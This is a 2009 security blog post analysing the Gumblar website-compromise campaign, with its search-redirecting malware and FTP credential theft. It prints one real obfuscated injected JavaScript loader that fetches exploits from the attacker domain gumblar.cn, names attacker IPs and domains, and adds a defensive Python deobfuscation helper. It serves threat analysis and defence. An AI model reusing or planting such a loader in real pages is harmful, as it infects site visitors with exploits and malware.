Google SERPs Redirections Turn to Bots
Throughout the first quarter of 2009, ScanSafe STAT has been monitoring an exponentially growing number of website compromises that deliver malware from 94.247.2.195. The malware resulting from the attacks forcibly redirects Google search page results to links other than the user expected. As we reported in "Malware Manipulating Google SERPs", that malware also includes a component to steal FTP usernames and passwords. As more and more folks get infected as a result of visits to the compromised sites or via the forcible search redirections, the attackers are able to collect even more FTP credentials and compromise ever increasing numbers of sites, thus gaining even greater numbers of victims.
Beginning in early May, a new twist occurred in these redirection attacks. When owners of the victim sites attempt to remove the malicious scripts related to the 94.247.2.195 compromise, a new malicious script is injected that pulls exploits and malware from gumblar.cn.
The injected scripts used in the gumblar.cn attacks appear to be dynamically obfuscated and thus may vary from site to site and even among pages on the same site. Following is one example of the injected script:
(function(){var kVA9=('var>20>61>3d>22>53crip>74En>67>69ne>22>2cb>3d>22Ver>73io>6e>28)+>22>2c>6a>3d>22>22>2cu>3d>6eavi>67ator>2euse>72>41g>65n>74>3bif>28(u>2ein>64ex>4ff(>22>57i>6e>22)>3e0)>26>26(>75>2e>69>6ede>78>4f>66(>22N>54>20>36>22)>3c>30)>26>26(doc>75ment>2ecoo>6bie>2ei>6ede>78Of>28>22mie>6b>3d1>22)>3c0)>26>26(t>79p>65of(z>72v>7at>73)>21>3dtypeof(>22A>22)))>7b>7arvzts>3d>22A>22>3beval(>22>69>66(wi>6edo>77>2e>22+a+>22>29j>3dj+>22+a+>22Major>22>2b>62+a+>22Mino>72>22>2b>62+a+>22Bui>6cd>22>2bb+>22j>3b>22>29>3bd>6f>63ument>2ewr>69>74>65(>22>3c>73cript>20>73>72>63>3d>2f>2fgu>6d>62>6car>2ecn>2frss>2f>3fid>3d>22+j+>22>3e>3c>5c>2f>73crip>74>3e>22)>3b>7d').replace(/>/g,'%');
var xpMR=unescape(kVA9);eval(xpMR)})();
The first portion of the script checks the user agent and looks for a particular cookie, then tries to determine what scripting engine is being used. Based on those results, the script writes out either a working or a non-working source reference. The attackers appear to be targeting Internet Explorer users by this process. The reason for the targeting is unclear, because the exploits used to deliver the malware involve Adobe PDF and Adobe Flash (SWF) vulnerabilities, which aren't browser-dependent.
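As an added example (not code from the original post), here is a small Python helper an analyst can use to reverse this obfuscation scheme offline: it locates the string literal whose hex escapes use a substitute marker, undoes the replace()/unescape() steps the way the browser would, and lists the hosts the decoded code would load a script from. The sample input is constructed in the same scheme, with example.invalid standing in for the real second-stage host.

```python
import re

# A Gumblar-style loader keeps its payload as a string literal whose hex escapes use
# a substitute marker (the page's sample uses '>'), swaps the marker back to '%' with
# String.replace(/marker/g,'%'), then runs unescape() and eval() on the result.
LOADER_RE = re.compile(
    r"""(['"])(?P<blob>.*?)\1\)\s*\.replace\(\s*/(?P<marker>[^/])/g\s*,\s*['"]%['"]\s*\)""",
    re.S,
)

def js_unescape(s: str) -> str:
    """Mirror JavaScript's unescape(): decode %XX and %uXXXX, leave anything else as-is."""
    return re.sub(
        r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )

def deobfuscate(script: str):
    """Return the code the loader would eval(), or None if the pattern is absent."""
    m = LOADER_RE.search(script)
    if m is None:
        return None
    return js_unescape(m.group("blob").replace(m.group("marker"), "%"))

def script_hosts(decoded: str) -> list:
    """Hosts referenced by <script src=...> tags the decoded code would write (for blocking/IR)."""
    return sorted(set(re.findall(r"""src=['"]?(?:https?:)?//([^/'"\s>]+)""", decoded)))

# Constructed sample in the same obfuscation scheme as the injected script above;
# example.invalid is a placeholder for the second-stage host.
SAMPLE = (
    "(function(){var kVA9=('if(>6eavigator>2euserAgent>2eindexOf(>22Win>22)>3e0)"
    ">7bdocument>2ewrite(>22>3cscript src>3d>2f>2fexample>2einvalid>2frss>2f>3fid"
    ">3d1>3e>3c>5c>2fscript>3e>22)>3b>7d').replace(/>/g,'%');"
    "var xpMR=unescape(kVA9);eval(xpMR)})();"
)

if __name__ == "__main__":
    decoded = deobfuscate(SAMPLE)
    print(decoded)
    print("second-stage hosts:", script_hosts(decoded))
```

Running the decoded output through this helper, rather than in a browser, shows the environment checks and the injected script source without ever contacting the attacker's host.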
The gumblar.cn compromise may also be accompanied by malicious iframes that load exploits and malware from domains hosted at 213.182.197.23, including liteautotop.cn, bigtruckstopseek.cn, autobestwestern.cn and several others. Both the 94.247.2.195 and 213.182.197.23 addresses are hosted in Latvia whereas the gumblar.cn domain has a Moscow IP that reverses to ukservers.com. Coincidentally, the malware loaded in the most recent round of attacks results in the installation of a backdoor that attempts to communicate with a botnet command & control located at 78.109.29.112 - a bot c&c with past ties to malware engaged in forcible redirects.

Mary Landesman
Reader Comments (2)
How does the malware get put on the infected web site?
Any advice on how to protect the web site or check if it is affected?